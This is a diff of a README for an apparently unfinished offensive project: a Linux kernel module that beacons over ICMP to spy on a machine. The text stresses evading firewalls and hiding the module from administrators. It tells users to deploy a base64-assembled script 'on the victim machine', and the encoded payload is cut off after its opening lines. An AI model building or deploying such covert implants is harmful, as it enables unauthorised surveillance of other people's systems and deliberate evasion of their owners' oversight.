ValmitCode/kernel-delirium/README.md

-# Kernel Delirium :smoking: (Not working yet, still requires development)
+# Kernel Delirium :smoking: :penguin: (Not working yet, still requires development)

 ## What is it about

 My idea was to create a kernel module for linux machine which is basically a beacon to spy on machine using ICMP protocoll which is usually less suspicious then tcp/udp f.ex, so even some firewalls don't mind.
 Additionally inexperienced System admin is not gonna try to look it up in kernel modules.
-Maybe in future to hide it better, I'll include the module in the system one
+Maybe in future to hide it better, I'll include the module in the system one.

 ## How to use?

-To use this software you should install a desktop app and run deploy_and_clean.py (I recommend to assemble file with base64)on the victim machine
+To use this software you should install a desktop app and run deploy_and_clean.py (I recommend to assemble file with base64) on the victim machine cause that's more time efficient.

-### Victim machine :syringe:
+### Victim machine :syringe: :computer:

 ```bash
 base64 -d aW1wb3J0IG9zCmltcG9ydCBhcmdwYXJzZQoKI21vZHVsZV9uYW1lIGlzIG5lZWRlZCB0byBoaWRl